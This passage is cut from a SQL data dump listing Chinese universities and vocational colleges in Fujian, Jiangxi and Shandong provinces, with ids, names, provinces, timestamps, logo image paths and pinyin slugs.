17:40:36','/images/school/default.png','quanzhoujingmaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1149,'福建对外经济贸易职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujianduiwaijingjimaoyizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1150,'湄洲湾职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','meizhouwanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1151,'福州海峡职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fuzhouhaixiazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1152,'三明医学科技职业学院','福建省','2014-04-23 00:00:00','2017-09-04 17:24:38','/images/school/default.png','sanmingzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1153,'福州软件职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fuzhouruanjianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1154,'厦门兴才职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shamenxingcaizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1155,'南昌大学','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','nanchangdaxue',0,NULL,NULL,0,NULL,NULL),(1156,'华东交通大学','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','huadongjiaotongdaxue',0,NULL,NULL,0,NULL,NULL),(1157,'东华理工大学','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','donghualigongdaxue',0,NULL,NULL,0,NULL,NULL),(1158,'南昌航空大学','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','nanchanghangkongdaxue',0,NULL,NULL,0,NULL,NULL),(1159,'江西理工大学','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxiligongdaxue',0,NULL,NULL,0,NULL,NULL),(1160,'江西农业大学','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxinongyedaxue',0,NULL,NULL,0,NULL,NULL),(1161,'江西中医药大学','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxizhongyiyaodaxue',0,NULL,NULL,0,NULL,NULL),(1162,'江西师范大学','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxishifandaxue',0,NULL,NULL,0,NULL,NULL),(1163,'井冈山大学','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jinggangshandaxue',0,NULL,NULL,0,NULL,NULL),(1164,'江西财经大学','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxicaijingdaxue',0,NULL,NULL,0,NULL,NULL),(1165,'江西科技师范大学','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxikejishifandaxue',0,NULL,NULL,0,NULL,NULL),(1166,'景德镇陶瓷大学','江西省','2014-04-23 00:00:00','2017-09-04 17:25:24','/images/school/default.png','jingdezhentaocixueyuan',0,NULL,NULL,0,NULL,NULL),(1167,'赣南医学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','gannanyixueyuan',0,NULL,NULL,0,NULL,NULL),(1168,'上饶师范学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shangraoshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1169,'宜春学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','yichunxueyuan',0,NULL,NULL,0,NULL,NULL),(1170,'赣南师范大学','江西省','2014-04-23 00:00:00','2017-09-04 17:26:05','/images/school/default.png','gannanshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1171,'江西科技学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxikejixueyuan',0,NULL,NULL,0,NULL,NULL),(1172,'景德镇学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jingdezhenxueyuan',0,NULL,NULL,0,NULL,NULL),(1173,'萍乡学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','pingxiangxueyuan',0,NULL,NULL,0,NULL,NULL),(1174,'南昌工程学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','nanchanggongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(1175,'江西警察学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxijingchaxueyuan',0,NULL,NULL,0,NULL,NULL),(1176,'新余学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','xinyuxueyuan',0,NULL,NULL,0,NULL,NULL),(1177,'九江学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiujiangxueyuan',0,NULL,NULL,0,NULL,NULL),(1178,'江西服装学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxifuzhuangxueyuan',0,NULL,NULL,0,NULL,NULL),(1179,'南昌工学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','nanchanggongxueyuan',0,NULL,NULL,0,NULL,NULL),(1180,'南昌师范学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','nanchangshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1181,'南昌理工学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','nanchangligongxueyuan',0,NULL,NULL,0,NULL,NULL),(1182,'江西医学高等专科学校','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxiyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1183,'赣州师范高等专科学校','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','ganzhoushifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1184,'南昌师范高等专科学校','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','nanchangshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1185,'江西中医药高等专科学校','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxizhongyiyaogaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1186,'江西工业职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxigongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1187,'九江职业大学','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiujiangzhiyedaxue',0,NULL,NULL,0,NULL,NULL),(1188,'九江职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiujiangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1189,'南昌职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','nanchangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1190,'江西太阳能科技职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxitaiyangnengkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1191,'江西枫林涉外经贸职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxifenglinshewaijingmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1192,'江西泰豪动漫职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxitaihaodongmanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1193,'江西冶金职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxiyejinzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1194,'江西管理职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxiguanlizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1195,'江西新闻出版职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxixinwenchubanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1196,'江西工商职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxigongshangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1197,'景德镇陶瓷职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jingdezhentaocizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1198,'共青科技职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','gongqingkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1199,'江西水利职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxishuilizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1200,'江西渝州科技职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxiyuzhoukejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1201,'江西司法警官职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxisifajingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1202,'江西陶瓷工艺美术职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxitaocigongyimeishuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1203,'江西旅游商贸职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxilvyoushangmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1204,'江西电力职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxidianlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1205,'江西环境工程职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxihuanjinggongchengzhiyexueyuan',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1206,'江西艺术职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxiyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1207,'鹰潭职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','yingtanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1208,'江西城市职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxichengshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1209,'江西信息应用职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxixinxiyingyongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1210,'江西交通职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxijiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1211,'江西财经职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxicaijingzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1212,'江西应用技术职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxiyingyongjishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1213,'江西现代职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxixiandaizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1214,'江西工业工程职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxigongyegongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1215,'江西机电职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxijidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1216,'江西科技职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxikejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1217,'江西外语外贸职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxiwaiyuwaimaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1218,'江西工业贸易职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxigongyemaoyizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1219,'宜春职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','yichunzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1220,'江西应用工程职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxiyingyonggongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1221,'江西生物科技职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxishengwukejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1222,'江西建设职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxijianshezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1223,'抚州职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fuzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1224,'江西先锋软件职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxixianfengruanjianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1225,'江西经济管理职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxijingjiguanlizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1226,'江西制造职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxizhizaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1227,'江西工程职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxigongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1228,'江西青年职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxiqingnianzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1229,'上饶职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shangraozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1230,'江西航空职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxihangkongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1231,'江西农业工程职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxinongyegongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1232,'赣西科技职业学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','ganxikejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1233,'江西护理职业技术学院','江西省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiangxihulizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1234,'山东大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongdaxue',0,NULL,NULL,0,NULL,NULL),(1235,'中国海洋大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','zhongguohaiyangdaxue',0,NULL,NULL,0,NULL,NULL),(1236,'山东科技大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongkejidaxue',0,NULL,NULL,0,NULL,NULL),(1237,'青岛科技大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','qingdaokejidaxue',0,NULL,NULL,0,NULL,NULL),(1238,'济南大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jinandaxue',0,NULL,NULL,0,NULL,NULL),(1239,'青岛理工大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','qingdaoligongdaxue',0,NULL,NULL,0,NULL,NULL),(1240,'山东建筑大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongjianzhudaxue',0,NULL,NULL,0,NULL,NULL),(1241,'齐鲁工业大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','qilugongyedaxue',0,NULL,NULL,0,NULL,NULL),(1242,'山东理工大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongligongdaxue',0,NULL,NULL,0,NULL,NULL),(1243,'山东农业大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongnongyedaxue',0,NULL,NULL,0,NULL,NULL),(1244,'青岛农业大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','qingdaonongyedaxue',0,NULL,NULL,0,NULL,NULL),(1245,'山东中医药大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongzhongyiyaodaxue',0,NULL,NULL,0,NULL,NULL),(1246,'山东师范大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongshifandaxue',0,NULL,NULL,0,NULL,NULL),(1247,'曲阜师范大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/1247.png','qufushifandaxue',0,NULL,NULL,0,NULL,NULL),(1248,'聊城大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','liaochengdaxue',0,NULL,NULL,0,NULL,NULL),(1249,'鲁东大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','ludongdaxue',0,NULL,NULL,0,NULL,NULL),(1250,'临沂大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','linyidaxue',0,NULL,NULL,0,NULL,NULL),(1251,'山东财经大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongcaijingdaxue',0,NULL,NULL,0,NULL,NULL),(1252,'青岛大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','qingdaodaxue',0,NULL,NULL,0,NULL,NULL),(1253,'烟台大学','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','yantaidaxue',0,NULL,NULL,0,NULL,NULL),(1254,'潍坊医学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','weifangyixueyuan',0,NULL,NULL,0,NULL,NULL),(1255,'泰山医学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','taishanyixueyuan',0,NULL,NULL,0,NULL,NULL),(1256,'滨州医学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','binzhouyixueyuan',0,NULL,NULL,0,NULL,NULL),(1257,'济宁医学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiningyixueyuan',0,NULL,NULL,0,NULL,NULL),(1258,'德州学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','dezhouxueyuan',0,NULL,NULL,0,NULL,NULL),(1259,'滨州学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','binzhouxueyuan',0,NULL,NULL,0,NULL,NULL),(1260,'泰山学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','taishanxueyuan',0,NULL,NULL,0,NULL,NULL),(1261,'济宁学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiningxueyuan',0,NULL,NULL,0,NULL,NULL),(1262,'菏泽学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','hezexueyuan',0,NULL,NULL,0,NULL,NULL),(1263,'山东体育学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/1263.png','shandongtiyuxueyuan',0,NULL,NULL,0,NULL,NULL),(1264,'山东艺术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongyishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1265,'山东万杰医学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongwanjieyixueyuan',0,NULL,NULL,0,NULL,NULL),(1266,'青岛滨海学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','qingdaobinhaixueyuan',0,NULL,NULL,0,NULL,NULL),(1267,'枣庄学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','zaozhuangxueyuan',0,NULL,NULL,0,NULL,NULL),(1268,'山东工艺美术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandonggongyimeishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1269,'潍坊学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','weifangxueyuan',0,NULL,NULL,0,NULL,NULL),(1270,'山东警察学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongjingchaxueyuan',0,NULL,NULL,0,NULL,NULL),(1271,'山东交通学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongjiaotongxueyuan',0,NULL,NULL,0,NULL,NULL),(1272,'山东工商学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandonggongshangxueyuan',0,NULL,NULL,0,NULL,NULL),(1273,'山东女子学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongnvzixueyuan',0,NULL,NULL,0,NULL,NULL),(1274,'潍坊科技学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','weifangkejixueyuan',0,NULL,NULL,0,NULL,NULL),(1275,'山东英才学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongyingcaixueyuan',0,NULL,NULL,0,NULL,NULL),(1276,'青岛黄海学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','qingdaohuanghaixueyuan',0,NULL,NULL,0,NULL,NULL),(1277,'山东协和学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongxiehexueyuan',0,NULL,NULL,0,NULL,NULL),(1278,'青岛工学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','qingdaogongxueyuan',0,NULL,NULL,0,NULL,NULL),(1279,'齐鲁师范学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','qilushifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1280,'山东青年政治学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongqingnianzhengzhixueyuan',0,NULL,NULL,0,NULL,NULL),(1281,'山东管理学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongguanlixueyuan',0,NULL,NULL,0,NULL,NULL),(1282,'山东农业工程学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongnongyegongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(1283,'烟台南山学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','yantainanshanxueyuan',0,NULL,NULL,0,NULL,NULL),(1284,'山东政法学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongzhengfaxueyuan',0,NULL,NULL,0,NULL,NULL),(1285,'山东医学高等专科学校','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1286,'菏泽医学专科学校','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','hezeyixuezhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1287,'山东电力高等专科学校','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongdianligaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1288,'济南幼儿师范高等专科学校','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jinanyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1289,'淄博师范高等专科学校','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','ziboshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1290,'山东中医药高等专科学校','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongzhongyiyaogaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1291,'山东商业职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongshangyezhiyejishuxueyuan',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(1292,'日照职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','rizhaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1293,'山东职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1294,'烟台工程职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','yantaigongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1295,'德州职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','dezhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1296,'菏泽家政职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','hezejiazhengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1297,'山东传媒职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongchuanmeizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1298,'临沂职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','linyizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1299,'枣庄职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','zaozhuangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1300,'山东理工职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongligongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1301,'山东文化产业职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongwenhuachanyezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1302,'青岛远洋船员职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','qingdaoyuanyangchuanyuanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1303,'济南护理职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jinanhulizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1304,'泰山护理职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','taishanhulizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1305,'山东海事职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandonghaishizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1306,'潍坊护理职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','weifanghulizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1307,'潍坊工程职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','weifanggongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1308,'菏泽职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','hezezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1309,'曲阜远东职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','qufuyuandongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1310,'青岛职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','qingdaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1311,'威海职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','weihaizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1312,'山东劳动职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandonglaodongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1313,'莱芜职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','laiwuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1314,'济宁职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jiningzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1315,'潍坊职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','weifangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1316,'烟台职业学院','山东省','2014-04-23 00:00:00','2015-10-16 